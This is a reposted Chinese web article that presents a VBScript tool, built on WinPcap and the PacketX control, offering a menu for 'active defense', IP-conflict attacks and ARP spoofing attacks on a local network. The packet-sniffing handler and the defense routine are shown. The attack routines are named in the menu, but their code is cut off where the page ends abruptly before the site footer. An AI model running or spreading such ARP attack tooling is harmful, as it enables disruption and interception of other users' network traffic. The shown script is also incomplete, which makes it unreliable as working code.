操纵VBS脚本来实现ARP攻击[网络技术]
本文“操纵VBS脚本来实现ARP攻击[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
'利用前安装WINPCAP3.1与下载packetx控件安装
'WINPCAP3.1自解紧缩安装下载地址http://www.ntbak.cn/WINPCAP3.1.exe
'packetx控件下载地址http://www.beesync.com/packetx/index.html
'利用办法:cscript.exe name.vbs
'code by 伤头脑
if (lcase(right(wscript.fullname,11))="wscript.exe") then '判断脚本宿主的名称
names=""""
wscript.echo "请利用CScript.exe " & names & WScript.ScriptFullName & names & " 调用脚本履行!"
wscript.quit
end if
if wscript.arguments.count>=1 then '判断有没有参数
wscript.echo ("本程序不能带参数运行,请将参数去掉!")
wscript.quit
end if
Set oPktX = WScript.CreateObject("PktX.PacketX","PacketX_") '成立控件
const PktXProtocolTypeEthernet = 1 '定义以太网报文常量
set shellrun = WScript.createobject("wscript.shell") '定义履行外部号令组件
dim var,gatawayip,sendtime,atip,mans '定义全局变量
mans=0
wscript.echo "1:举行主动防备"
wscript.echo "2:举行IP冲突攻击"
wscript.echo "3:举行ARP拐骗攻击"
wscript.echo ""
wscript.echo ""
WScript.StdOut.Write "请挑选序号举行操作# "
select case trim(WScript.StdIn.ReadLine)
case "1"
Defense '举行主动防备
case "2"
Attack '举行IP冲突攻击
case "3"
Deception '举行ARP拐骗攻击
end select
Public Sub PacketX_OnPacket(ByRef oPacket) '开始监听报解码报文历程
if oPacket.Protocol = PktXProtocolTypeEthernet _
and oPacket.SourceMacAddress <> oPktX.Adapter.HWAddress _
and oPacket.DestMacAddress <> "FF:FF:FF:FF:FF:FF" then
var=oPacket.SourceMacAddress '获得应答报文的源MAC地址
if sourmac = "" and mans=0 then
mans=1
sourmac=Split(var, ":", -1, 1)
end if
WScript.Echo "源MAC" &vbTab& _
oPacket.SourceMacAddress &vbTab& "=> " & _
"目的MAC" &vbTab& oPacket.DestMacAddress
oPktX.stop
end if
exit sub
End Sub
sub Defense() '举行主动防备历程
readdrives '调用挑选收发报文网卡历程
WScript.StdOut.Write "请输入本机网关IP地址: "
gatawayip = trim(WScript.StdIn.ReadLine)
sHWAddr = oPktX.Adapter.HWAddress '得到本机MAC
loaclip = oPktX.Adapter.NETIP '得到本机IP
tomacs="FFFFFFFFFFFF" '定义目的MAC地址
oPktX.Start '开始监听报文
call sendmes(gatawayip,tomacs,loaclip,sHWAddr,"1") '调用构造发送ARP报文历程
wscript.sleep(1000) '监听时间1400ms
'oPktX.stop '终止监听报文
var2=(Replace(var,":","-"))
wscript.echo ""
wscript.echo ""
wscript.echo "程序检测出的网关: " & gatawayip & " 的MAC地址为: " & var2
wscript.echo "您要举行静太绑定吗?假如存在大量ARP攻击,这个检测大概是错误的."
wscript.echo "10秒后开始主动防备 退出请按CTRL+C"
wscript.echo ""
wscript.echo ""
以上是“操纵VBS脚本来实现ARP攻击[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |